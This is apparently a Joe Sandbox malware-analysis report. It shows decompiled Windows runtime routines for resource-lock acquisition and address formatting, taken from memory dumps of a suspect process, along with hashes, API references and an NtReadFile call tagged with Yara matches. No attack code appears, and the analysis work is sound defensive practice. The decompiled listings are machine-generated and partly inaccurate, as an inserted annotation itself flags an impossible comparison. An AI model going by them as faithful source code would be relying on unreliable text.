                                                    									_t51 = E008DF8CC( *((intOrPtr*)(_t96 + 0x18)));
                                                    									__eflags = _t51 - 0x102;
                                                    									if(_t51 != 0x102) {
                                                    										break;
                                                    									}
                                                    									_t106 =  *(_t144 + 4);
                                                    									_t126 =  *_t144;
                                                    									_t86 = L00924FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
                                                    									_push(_t126);
                                                    									_push(_t86);
                                                    									L00933F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
                                                    									L00933F92(0x65, 0, "RTL: Resource at %p\n", _t96);
                                                    									_t130 = _t130 + 1;
                                                    									_t160 = _t158 + 0x28;
                                                    									__eflags = _t130 - 2;
                                                    									if(__eflags > 0) {
                                                    										E0096217A(_t106, __eflags, _t96);
                                                    									}
                                                    									_push("RTL: Re-Waiting\n");
                                                    									_push(0);
                                                    									_push(0x65);
                                                    									L00933F92();
                                                    									_t158 = _t160 + 0xc;
                                                    								}
                                                    								__eflags = _t51;
                                                    								if(__eflags < 0) {
                                                    									_push(_t51);
                                                    									E00923915(_t96, _t106, _t118, _t130, _t144, __eflags);
                                                    									asm("int3");
                                                    									while(1) {
                                                    										L32:
                                                    										__eflags = _a8;
                                                    										if(_a8 == 0) {
                                                    											break;
                                                    										}
                                                    										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
                                                    										_t119 = _t96 + 0x24;
                                                    										_t107 = 1;
                                                    										asm("lock xadd [eax], ecx");
                                                    										_t56 =  *(_t96 + 0x28);
                                                    										_a4 = _t56;
                                                    										__eflags = _t56;
                                                    										if(_t56 != 0) {
                                                    											L40:
                                                    											_t128 = 0;
                                                    											__eflags = 0;
                                                    											while(1) {
                                                    												_t121 =  *(_t96 + 0x30) & 0x00000001;
                                                    												asm("sbb esi, esi");
                                                    												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x009c01c0;
                                                    												_push(_t138);
                                                    												_push(0);
                                                    												_t58 = E008DF8CC( *((intOrPtr*)(_t96 + 0x20)));
                                                    												__eflags = _t58 - 0x102;
                                                    												if(_t58 != 0x102) {
                                                    													break;
                                                    												}
                                                    												_t107 =  *(_t138 + 4);
                                                    												_t125 =  *_t138;
                                                    												_t75 = L00924FC0(_t125, _t107, 0xff676980, 0xffffffff);
                                                    												_push(_t125);
                                                    												_push(_t75);
                                                    												L00933F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
                                                    												L00933F92(0x65, 0, "RTL: Resource at %p\n", _t96);
                                                    												_t128 = _t128 + 1;
                                                    												_t159 = _t158 + 0x28;
                                                    												__eflags = _t128 - 2;
                                                    												if(__eflags > 0) {
                                                    													E0096217A(_t107, __eflags, _t96);
                                                    												}
                                                    												_push("RTL: Re-Waiting\n");
                                                    												_push(0);
                                                    												_push(0x65);
                                                    												L00933F92();
                                                    												_t158 = _t159 + 0xc;
                                                    											}
                                                    											__eflags = _t58;
                                                    											if(__eflags < 0) {
                                                    												_push(_t58);
                                                    												E00923915(_t96, _t107, _t121, _t128, _t138, __eflags);
                                                    												asm("int3");
                                                    												_t61 =  *_t107;
                                                    												 *_t107 = 0;
                                                    												__eflags = _t61;
                                                    												if(_t61 == 0) {
                                                    													L1:
                                                    													_t63 = E00905384(_t138 + 0x24);
                                                    													if(_t63 != 0) {
                                                    														goto L52;
                                                    													} else {
                                                    														goto L2;
                                                    													}
                                                    												} else {
                                                    													_t123 =  *((intOrPtr*)(_t138 + 0x18));
                                                    													_push( &_a4);
                                                    													_push(_t61);
                                                    													_t70 = L008DF970( *((intOrPtr*)(_t138 + 0x18)));
                                                    													__eflags = _t70;
                                                    													if(__eflags >= 0) {
                                                    														goto L1;
                                                    													} else {
                                                    														_push(_t70);
                                                    														E00923915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
                                                    														L52:
                                                    														_t122 =  *((intOrPtr*)(_t138 + 0x20));
                                                    														_push( &_a4);
                                                    														_push(1);
                                                    														_t63 = L008DF970( *((intOrPtr*)(_t138 + 0x20)));
                                                    														__eflags = _t63;
                                                    														if(__eflags >= 0) {
                                                    															L2:
                                                    															return _t63;
                                                    														} else {
                                                    															_push(_t63);
                                                    															E00923915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
                                                    															_t109 =  *((intOrPtr*)(_t138 + 0x20));
                                                    															_push( &_a4);
                                                    															_push(1);
                                                    															_t63 = L008DF970( *((intOrPtr*)(_t138 + 0x20)));
                                                    															__eflags = _t63;
                                                    															if(__eflags >= 0) {
                                                    																goto L2;
                                                    															} else {
                                                    																_push(_t63);
                                                    																_t66 = E00923915(_t96, _t109, _t122, _t128, _t138, __eflags);
                                                    																asm("int3");
                                                    																while(1) {
                                                    																	_t110 = _t66;
                                                    																	__eflags = _t66 - 1;
                                                    																	if(_t66 != 1) {
                                                    																		break;
                                                    																	}
                                                    																	_t128 = _t128 | 0xffffffff;
                                                    																	_t66 = _t110;
                                                    																	asm("lock cmpxchg [ebx], edi");
                                                    																	__eflags = _t66 - _t110;
                                                    																	if(_t66 != _t110) {
                                                    																		continue;
                                                    																	} else {
                                                    																		_t67 =  *[fs:0x18];
                                                    																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
                                                    																		return _t67;
                                                    																	}
                                                    																	goto L58;
                                                    																}
                                                    																E00905329(_t110, _t138);
                                                    																return E009053A5(_t138, 1);
                                                    															}
                                                    														}
                                                    													}
                                                    												}
                                                    											} else {
                                                    												_t56 =  *(_t96 + 0x28);
                                                    												goto L3;
                                                    											}
                                                    										} else {
                                                    											_t107 =  *_t119;
                                                    											__eflags = _t107;
                                                    											if(__eflags > 0) {
                                                    												while(1) {
                                                    													_t81 = _t107;
                                                    													asm("lock cmpxchg [edi], esi");
                                                    													__eflags = _t81 - _t107;
                                                    													if(_t81 == _t107) {
                                                    														break;
                                                    													}
                                                    													_t107 = _t81;
                                                    													__eflags = _t81;
                                                    													if(_t81 > 0) {
                                                    														continue;
                                                    													}
                                                    													break;
                                                    												}
                                                    												_t56 = _a4;
                                                    												__eflags = _t107;
                                                    											}
                                                    											if(__eflags != 0) {
                                                    												while(1) {
                                                    													L3:
                                                    													__eflags = _t56;
                                                    													if(_t56 != 0) {
                                                    														goto L32;
                                                    													}
                                                    													_t107 = _t107 | 0xffffffff;
                                                    													_t56 = 0;
                                                    													asm("lock cmpxchg [edx], ecx");
                                                    													__eflags = 0;
                                                    													if(0 != 0) {
                                                    														continue;
                                                    													} else {
                                                    														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                    														return 1;
                                                    													}
                                                    													goto L58;
                                                    												}
                                                    												continue;
                                                    											} else {
                                                    												goto L40;
                                                    											}
                                                    										}
                                                    										goto L58;
                                                    									}
                                                    									__eflags = 0;
                                                    									return 0;
                                                    								} else {
                                                    									_t115 =  *(_t96 + 0x28);
                                                    									continue;
                                                    								}
                                                    							} else {
                                                    								_t106 =  *_t49;
                                                    								__eflags = _t106;
                                                    								if(__eflags > 0) {
                                                    									while(1) {
                                                    										_t93 = _t106;
                                                    										asm("lock cmpxchg [edi], esi");
                                                    										__eflags = _t93 - _t106;
                                                    										if(_t93 == _t106) {
                                                    											break;
                                                    										}
                                                    										_t106 = _t93;
                                                    										__eflags = _t93;
                                                    										if(_t93 > 0) {
                                                    											continue;
                                                    										}
                                                    										break;
                                                    									}
                                                    									__eflags = _t106;
                                                    								}
                                                    								if(__eflags != 0) {
                                                    									continue;
                                                    								} else {
                                                    									goto L23;
                                                    								}
                                                    							}
                                                    						}
                                                    						goto L58;
                                                    					}
                                                    					_t84 = _t115;
                                                    					asm("lock cmpxchg [esi], ecx");
                                                    					__eflags = _t84 - _t115;
                                                    					if(_t84 != _t115) {
                                                    						_t115 = _t84;
                                                    						goto L7;
                                                    					} else {
                                                    						return 1;
                                                    					}
                                                    				}
                                                    				L58:
                                                    			}

                                                    Instruction addresses for the listing above (the per-line address column, detached from the listing by extraction): 0x0092055a-0x009205f3, 0x00942178-0x009423d7, 0x00905367-0x009053ea, 0x00939153-0x00939176.

                                                    APIs
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00942206
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.520658018.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true
                                                    • Associated: 00000005.00000002.520651238.00000000008C0000.00000040.00000001.sdmp
                                                    • Associated: 00000005.00000002.520733640.00000000009B0000.00000040.00000001.sdmp
                                                    • Associated: 00000005.00000002.520745735.00000000009C0000.00000040.00000001.sdmp
                                                    • Associated: 00000005.00000002.520755567.00000000009C4000.00000040.00000001.sdmp
                                                    • Associated: 00000005.00000002.520772990.00000000009C7000.00000040.00000001.sdmp
                                                    • Associated: 00000005.00000002.520782564.00000000009D0000.00000040.00000001.sdmp
                                                    • Associated: 00000005.00000002.520822745.0000000000A30000.00000040.00000001.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_8c0000_vbc.jbxd
                                                    Similarity
                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                    • API String ID: 885266447-4236105082
                                                    • Opcode ID: 7f8399c3b9ea445a357b7054912a45873d2b1d515a6ae292e473facf150e1592
                                                    • Instruction ID: 793d0a2ddc17d124f23479943d463c3082c7fe029ffe019ac97662dd03e1cd72
                                                    • Opcode Fuzzy Hash: 7f8399c3b9ea445a357b7054912a45873d2b1d515a6ae292e473facf150e1592
                                                    • Instruction Fuzzy Hash: 91513831B442116FEB14DF19DC81FA633AEBFD8720F218229FD59DB286D965EC418B90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 64%
			E009214C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
				// Editor's annotation of the decompiler output: the routine renders an address into a caller buffer as
				// "[address%scope]:port" (brackets and port only when a port is given, "%scope" only when a scope id is given).
				// _a4 = address, _a8 = scope id, _a12 = port, _a16 = destination buffer, _a20 = in/out length in wide characters.
				signed int _v8;   // /GS stack cookie: global cookie at 0x9c2088 XORed with the frame pointer
				char _v10;        // end of the scratch buffer; the "&_v10 - cursor >> 1" expressions below are the remaining wide-character count
				char _v140;       // start of the 0x41-wide-character scratch buffer the text is formatted into
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t24;
				void* _t26;
				void* _t28;       // write cursor into the scratch buffer (used below but not declared by the decompiler)
				signed int _t29;
				signed int _t34;
				signed int _t40;
				intOrPtr _t45;
				void* _t51;
				intOrPtr* _t52;
				intOrPtr _t53;    // first the address argument, later the required length (not declared by the decompiler)
				void* _t54;
				signed int _t57;
				void* _t58;

				_t51 = __edx;
				_t24 =  *0x9c2088; // 0x752eead3
				_v8 = _t24 ^ _t57; // store the stack cookie
				_t45 = _a16;       // destination buffer
				_t53 = _a4;        // address
				_t52 = _a20;       // pointer to the caller's length, overwritten with the required length below
				if(_a4 == 0 || _t52 == 0) {
					L10:
					_t26 = 0xc000000d; // STATUS_INVALID_PARAMETER
				} else {
					if(_t45 == 0) {
						// a NULL destination is only accepted together with a zero length (length query)
						if( *_t52 == _t45) {
							goto L3;
						} else {
							goto L10;
						}
					} else {
						L3:
						_t28 =  &_v140;
						if(_a12 != 0) {
							// a port is given: open the bracket (E00917707 is the ___swprintf_l wrapper in the API list; 0x41 is the buffer size)
							_push("[");
							_push(0x41);
							_push( &_v140);
							_t29 = E00917707();
							_t58 = _t58 + 0xc;
							_t28 = _t57 + _t29 * 2 - 0x88; // advance the cursor by the characters written
						}
						_t54 = E009213CB(_t53, _t28);  // presumably renders the address text at the cursor and returns the new cursor (it also calls ___swprintf_l)
						if(_a8 != 0) {
							// scope id: L"%%%u" formats as "%<scope>"
							_t34 = E00917707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t34 * 2;
						}
						if(_a12 != 0) {
							// close the bracket and append the port, masked to 16 bits
							_t40 = E00917707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t40 * 2;
						}
						_t53 = (_t54 -  &_v140 >> 1) + 1; // required length in wide characters, terminator included
						 *_t52 = _t53;                     // report it to the caller in every case
						// As printed this comparison can never be true; the compare appears to be against the caller's
						// original length, loaded before the store above (decompiler ordering). Too small a buffer
						// yields STATUS_INVALID_PARAMETER with the required length already stored through _a20.
						if( *_t52 < _t53) {
							goto L10;
						} else {
							E008E2340(_t45,  &_v140, _t53 + _t53); // memcpy-style copy of _t53 wide characters (2 * _t53 bytes)
							_t26 = 0; // STATUS_SUCCESS
						}
					}
				}
				return E008EE1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53); // stack-cookie check on return
			}

                                                    Instruction addresses for the listing above (the per-line address column, detached from the listing by extraction): 0x009214c0-0x0092157a, 0x0094ea0f-0x0094ea58.

                                                    APIs
                                                    • ___swprintf_l.LIBCMT ref: 0094EA22
                                                      • Part of subcall function 009213CB: ___swprintf_l.LIBCMT ref: 0092146B
                                                      • Part of subcall function 009213CB: ___swprintf_l.LIBCMT ref: 00921490
                                                    • ___swprintf_l.LIBCMT ref: 0092156D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.520658018.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true
                                                    • Associated: 00000005.00000002.520651238.00000000008C0000.00000040.00000001.sdmp
                                                    • Associated: 00000005.00000002.520733640.00000000009B0000.00000040.00000001.sdmp
                                                    • Associated: 00000005.00000002.520745735.00000000009C0000.00000040.00000001.sdmp
                                                    • Associated: 00000005.00000002.520755567.00000000009C4000.00000040.00000001.sdmp
                                                    • Associated: 00000005.00000002.520772990.00000000009C7000.00000040.00000001.sdmp
                                                    • Associated: 00000005.00000002.520782564.00000000009D0000.00000040.00000001.sdmp
                                                    • Associated: 00000005.00000002.520822745.0000000000A30000.00000040.00000001.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_8c0000_vbc.jbxd
                                                    Similarity
                                                    • API ID: ___swprintf_l
                                                    • String ID: %%%u$]:%u
                                                    • API String ID: 48624451-3050659472
                                                    • Opcode ID: 71d5ca907205cd4976efabcda740ac7818ff484fdcb5ac6cef4c810901f504f8
                                                    • Instruction ID: b86a9c3584357acc35dd5c5c0693380c57c963b60c5937a2bbfa751d57c5921c
                                                    • Opcode Fuzzy Hash: 71d5ca907205cd4976efabcda740ac7818ff484fdcb5ac6cef4c810901f504f8
                                                    • Instruction Fuzzy Hash: A621C372A002299BCF21DE58DC41EEAB3BCFBA0700F444551FC46D3245DB749A698BE1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 44%
                                                    			E009053A5(signed int _a4, char _a8) {
                                                    				void* __ebx;
                                                    				void* __edi;
                                                    				void* __esi;
                                                    				signed int _t32;
                                                    				signed int _t37;
                                                    				signed int _t40;
                                                    				signed int _t42;
                                                    				void* _t45;
                                                    				intOrPtr _t46;
                                                    				signed int _t49;
                                                    				void* _t51;
                                                    				signed int _t57;
                                                    				signed int _t64;
                                                    				signed int _t71;
                                                    				void* _t74;
                                                    				intOrPtr _t78;
                                                    				signed int* _t79;
                                                    				void* _t85;
                                                    				signed int _t86;
                                                    				signed int _t92;
                                                    				void* _t104;
                                                    				void* _t105;
                                                    
                                                    				_t64 = _a4;
                                                    				_t32 =  *(_t64 + 0x28);
                                                    				_t71 = _t64 + 0x28;
                                                    				_push(_t92);
                                                    				if(_t32 < 0) {
                                                    					_t78 =  *[fs:0x18];
                                                    					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
                                                    					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
                                                    						goto L3;
                                                    					} else {
                                                    						__eflags = _t32 | 0xffffffff;
                                                    						asm("lock xadd [ecx], eax");
                                                    						return 1;
                                                    					}
                                                    				} else {
                                                    					L3:
                                                    					_push(_t86);
                                                    					while(1) {
                                                    						L4:
                                                    						__eflags = _t32;
                                                    						if(_t32 == 0) {
                                                    							break;
                                                    						}
                                                    						__eflags = _a8;
                                                    						if(_a8 == 0) {
                                                    							__eflags = 0;
                                                    							return 0;
                                                    						} else {
                                                    							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
                                                    							_t79 = _t64 + 0x24;
                                                    							_t71 = 1;
                                                    							asm("lock xadd [eax], ecx");
                                                    							_t32 =  *(_t64 + 0x28);
                                                    							_a4 = _t32;
                                                    							__eflags = _t32;
                                                    							if(_t32 != 0) {
                                                    								L19:
                                                    								_t86 = 0;
                                                    								__eflags = 0;
                                                    								while(1) {
                                                    									_t81 =  *(_t64 + 0x30) & 0x00000001;
                                                    									asm("sbb esi, esi");
                                                    									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x009c01c0;
                                                    									_push(_t92);
                                                    									_push(0);
                                                    									_t37 = E008DF8CC( *((intOrPtr*)(_t64 + 0x20)));
                                                    									__eflags = _t37 - 0x102;
                                                    									if(_t37 != 0x102) {
                                                    										break;
                                                    									}
                                                    									_t71 =  *(_t92 + 4);
                                                    									_t85 =  *_t92;
                                                    									_t51 = L00924FC0(_t85, _t71, 0xff676980, 0xffffffff);
                                                    									_push(_t85);
                                                    									_push(_t51);
                                                    									L00933F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
                                                    									L00933F92(0x65, 0, "RTL: Resource at %p\n", _t64);
                                                    									_t86 = _t86 + 1;
                                                    									_t105 = _t104 + 0x28;
                                                    									__eflags = _t86 - 2;
                                                    									if(__eflags > 0) {
                                                    										E0096217A(_t71, __eflags, _t64);
                                                    									}
                                                    									_push("RTL: Re-Waiting\n");
                                                    									_push(0);
                                                    									_push(0x65);
                                                    									L00933F92();
                                                    									_t104 = _t105 + 0xc;
                                                    								}
                                                    								__eflags = _t37;
                                                    								if(__eflags < 0) {
                                                    									_push(_t37);
                                                    									E00923915(_t64, _t71, _t81, _t86, _t92, __eflags);
                                                    									asm("int3");
                                                    									_t40 =  *_t71;
                                                    									 *_t71 = 0;
                                                    									__eflags = _t40;
                                                    									if(_t40 == 0) {
                                                    										L1:
                                                    										_t42 = E00905384(_t92 + 0x24);
                                                    										if(_t42 != 0) {
                                                    											goto L31;
                                                    										} else {
                                                    											goto L2;
                                                    										}
                                                    									} else {
                                                    										_t83 =  *((intOrPtr*)(_t92 + 0x18));
                                                    										_push( &_a4);
                                                    										_push(_t40);
                                                    										_t49 = L008DF970( *((intOrPtr*)(_t92 + 0x18)));
                                                    										__eflags = _t49;
                                                    										if(__eflags >= 0) {
                                                    											goto L1;
                                                    										} else {
                                                    											_push(_t49);
                                                    											E00923915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
                                                    											L31:
                                                    											_t82 =  *((intOrPtr*)(_t92 + 0x20));
                                                    											_push( &_a4);
                                                    											_push(1);
                                                    											_t42 = L008DF970( *((intOrPtr*)(_t92 + 0x20)));
                                                    											__eflags = _t42;
                                                    											if(__eflags >= 0) {
                                                    												L2:
                                                    												return _t42;
                                                    											} else {
                                                    												_push(_t42);
                                                    												E00923915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
                                                    												_t73 =  *((intOrPtr*)(_t92 + 0x20));
                                                    												_push( &_a4);
                                                    												_push(1);
                                                    												_t42 = L008DF970( *((intOrPtr*)(_t92 + 0x20)));
                                                    												__eflags = _t42;
                                                    												if(__eflags >= 0) {
                                                    													goto L2;
                                                    												} else {
                                                    													_push(_t42);
                                                    													_t45 = E00923915(_t64, _t73, _t82, _t86, _t92, __eflags);
                                                    													asm("int3");
                                                    													while(1) {
                                                    														_t74 = _t45;
                                                    														__eflags = _t45 - 1;
                                                    														if(_t45 != 1) {
                                                    															break;
                                                    														}
                                                    														_t86 = _t86 | 0xffffffff;
                                                    														_t45 = _t74;
                                                    														asm("lock cmpxchg [ebx], edi");
                                                    														__eflags = _t45 - _t74;
                                                    														if(_t45 != _t74) {
                                                    															continue;
                                                    														} else {
                                                    															_t46 =  *[fs:0x18];
                                                    															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
                                                    															return _t46;
                                                    														}
                                                    														goto L37;
                                                    													}
                                                    													E00905329(_t74, _t92);
                                                    													_push(1);
                                                    													return E009053A5(_t92);
                                                    												}
                                                    											}
                                                    										}
                                                    									}
                                                    								} else {
                                                    									_t32 =  *(_t64 + 0x28);
                                                    									continue;
                                                    								}
                                                    							} else {
                                                    								_t71 =  *_t79;
                                                    								__eflags = _t71;
                                                    								if(__eflags > 0) {
                                                    									while(1) {
                                                    										_t57 = _t71;
                                                    										asm("lock cmpxchg [edi], esi");
                                                    										__eflags = _t57 - _t71;
                                                    										if(_t57 == _t71) {
                                                    											break;
                                                    										}
                                                    										_t71 = _t57;
                                                    										__eflags = _t57;
                                                    										if(_t57 > 0) {
                                                    											continue;
                                                    										}
                                                    										break;
                                                    									}
                                                    									_t32 = _a4;
                                                    									__eflags = _t71;
                                                    								}
                                                    								if(__eflags != 0) {
                                                    									continue;
                                                    								} else {
                                                    									goto L19;
                                                    								}
                                                    							}
                                                    						}
                                                    						goto L37;
                                                    					}
                                                    					_t71 = _t71 | 0xffffffff;
                                                    					_t32 = 0;
                                                    					asm("lock cmpxchg [edx], ecx");
                                                    					__eflags = 0;
                                                    					if(0 != 0) {
                                                    						goto L4;
                                                    					} else {
                                                    						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                    						return 1;
                                                    					}
                                                    				}
                                                    				L37:
                                                     			}

                                                    0x009053ab
                                                    0x009053ae
                                                    0x009053b1
                                                    0x009053b4
                                                    0x009053b7
                                                    0x009205b6
                                                    0x009205c0
                                                    0x009205c3
                                                    0x00000000
                                                    0x009205c9
                                                    0x009205c9
                                                    0x009205cc
                                                    0x009205d5
                                                    0x009205d5
                                                    0x009053bd
                                                    0x009053bd
                                                    0x009053bd
                                                    0x009053be
                                                    0x009053be
                                                    0x009053be
                                                    0x009053c0
                                                    0x00000000
                                                    0x00000000
                                                    0x00942269
                                                    0x0094226d
                                                    0x00942349
                                                    0x0094234d
                                                    0x00942273
                                                    0x00942276
                                                    0x00942279
                                                    0x0094227e
                                                    0x00942283
                                                    0x00942287
                                                    0x0094228a
                                                    0x0094228d
                                                    0x0094228f
                                                    0x009422bc
                                                    0x009422bc
                                                    0x009422bc
                                                    0x009422be
                                                    0x009422c4
                                                    0x009422cc
                                                    0x009422d0
                                                    0x009422d6
                                                    0x009422d7
                                                    0x009422da
                                                    0x009422df
                                                    0x009422e4
                                                    0x00000000
                                                    0x00000000
                                                    0x009422e6
                                                    0x009422e9
                                                    0x009422f4
                                                    0x009422f9
                                                    0x009422fa
                                                    0x00942305
                                                    0x00942314
                                                    0x00942319
                                                    0x0094231a
                                                    0x0094231d
                                                    0x00942320
                                                    0x00942323
                                                    0x00942323
                                                    0x00942328
                                                    0x0094232d
                                                    0x0094232f
                                                    0x00942331
                                                    0x00942336
                                                    0x00942336
                                                    0x0094233b
                                                    0x0094233d
                                                    0x00942350
                                                    0x00942351
                                                    0x00942356
                                                    0x00942359
                                                    0x00942359
                                                    0x0094235b
                                                    0x0094235d
                                                    0x00905367
                                                    0x0090536b
                                                    0x00905372
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00942363
                                                    0x00942363
                                                    0x00942369
                                                    0x0094236a
                                                    0x0094236c
                                                    0x00942371
                                                    0x00942373
                                                    0x00000000
                                                    0x00942379
                                                    0x00942379
                                                    0x0094237a
                                                    0x0094237f
                                                    0x0094237f
                                                    0x00942385
                                                    0x00942386
                                                    0x00942389
                                                    0x0094238e
                                                    0x00942390
                                                    0x00905378
                                                    0x0090537c
                                                    0x00942396
                                                    0x00942396
                                                    0x00942397
                                                    0x0094239c
                                                    0x009423a2
                                                    0x009423a3
                                                    0x009423a6
                                                    0x009423ab
                                                    0x009423ad
                                                    0x00000000
                                                    0x009423b3
                                                    0x009423b3
                                                    0x009423b4
                                                    0x009423b9
                                                    0x009423ba
                                                    0x009423ba
                                                    0x009423bc
                                                    0x009423bf
                                                    0x00000000
                                                    0x00000000
                                                    0x00939153
                                                    0x00939158
                                                    0x0093915a
                                                    0x0093915e
                                                    0x00939160
                                                    0x00000000
                                                    0x00939166
                                                    0x00939166
                                                    0x00939171
                                                    0x00939176
                                                    0x00939176
                                                    0x00000000
                                                    0x00939160
                                                    0x009423c6
                                                    0x009423cb
                                                    0x009423d7
                                                    0x009423d7
                                                    0x009423ad
                                                    0x00942390
                                                    0x00942373
                                                    0x0094233f
                                                    0x0094233f
                                                    0x00000000
                                                    0x0094233f
                                                    0x00942291
                                                    0x00942291
                                                    0x00942293
                                                    0x00942295
                                                    0x0094229a
                                                    0x009422a1
                                                    0x009422a3
                                                    0x009422a7
                                                    0x009422a9
                                                    0x00000000
                                                    0x00000000
                                                    0x009422ab
                                                    0x009422ad
                                                    0x009422af
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x009422af
                                                    0x009422b1
                                                    0x009422b4
                                                    0x009422b4
                                                    0x009422b6
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x009422b6
                                                    0x0094228f
                                                    0x00000000
                                                    0x0094226d
                                                    0x009053cb
                                                    0x009053ce
                                                    0x009053d0
                                                    0x009053d4
                                                    0x009053d6
                                                    0x00000000
                                                    0x009053d8
                                                    0x009053e3
                                                    0x009053ea
                                                    0x009053ea
                                                    0x009053d6
                                                    0x00000000

                                                    APIs
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009422F4
                                                    Strings
                                                    • RTL: Re-Waiting, xrefs: 00942328
                                                    • RTL: Resource at %p, xrefs: 0094230B
                                                    • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 009422FC
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.520658018.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true
                                                     • Associated: 00000005.00000002.520651238.00000000008C0000.00000040.00000001.sdmp
                                                     • Associated: 00000005.00000002.520733640.00000000009B0000.00000040.00000001.sdmp
                                                     • Associated: 00000005.00000002.520745735.00000000009C0000.00000040.00000001.sdmp
                                                     • Associated: 00000005.00000002.520755567.00000000009C4000.00000040.00000001.sdmp
                                                     • Associated: 00000005.00000002.520772990.00000000009C7000.00000040.00000001.sdmp
                                                     • Associated: 00000005.00000002.520782564.00000000009D0000.00000040.00000001.sdmp
                                                     • Associated: 00000005.00000002.520822745.0000000000A30000.00000040.00000001.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_8c0000_vbc.jbxd
                                                    Similarity
                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                    • API String ID: 885266447-871070163
                                                    • Opcode ID: b91340d17bf77faace0eef8e4eaa658ae49916064c143a4ddc1e9862bec382eb
                                                    • Instruction ID: 981150c3536c3a050b69dd4708f98fb73769ec028dfe72511bbc16febd22fefc
                                                    • Opcode Fuzzy Hash: b91340d17bf77faace0eef8e4eaa658ae49916064c143a4ddc1e9862bec382eb
                                                    • Instruction Fuzzy Hash: B8512671600711ABEB149F28CC81FA773ACFF94760F114229FD18DB281EAA5ED418BA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Execution Graph

                                                    Execution Coverage:2.1%
                                                    Dynamic/Decrypted Code Coverage:0%
                                                    Signature Coverage:0%
                                                    Total number of Nodes:663
                                                    Total number of Limit Nodes:82

                                                    Graph


                                                    Executed Functions

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 218 d869d-d869e 219 d86a0-d86e9 call d91f0 NtReadFile 218->219 220 d8672-d8699 218->220
                                                    APIs
                                                    • NtReadFile.NTDLL(000D3D82,5E972F65,FFFFFFFF,?,?,?,000D3D82,?,A:,FFFFFFFF,5E972F65,000D3D82,?,00000000), ref: 000D86E5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.686491599.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_c0000_cmd.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID: *9$A:
                                                    • API String ID: 2738559852-676615714
                                                    • Opcode ID: c411b23a7d8ce458fa6bd1e8fc80453f24cf5a1fe97e172fa39a592094cb97de
                                                    • Instruction ID: 723af1f453acd6b6b34ded043a8f671caf0f62d93dd19883fe550f67978142d9
                                                    • Opcode Fuzzy Hash: c411b23a7d8ce458fa6bd1e8fc80453f24cf5a1fe97e172fa39a592094cb97de
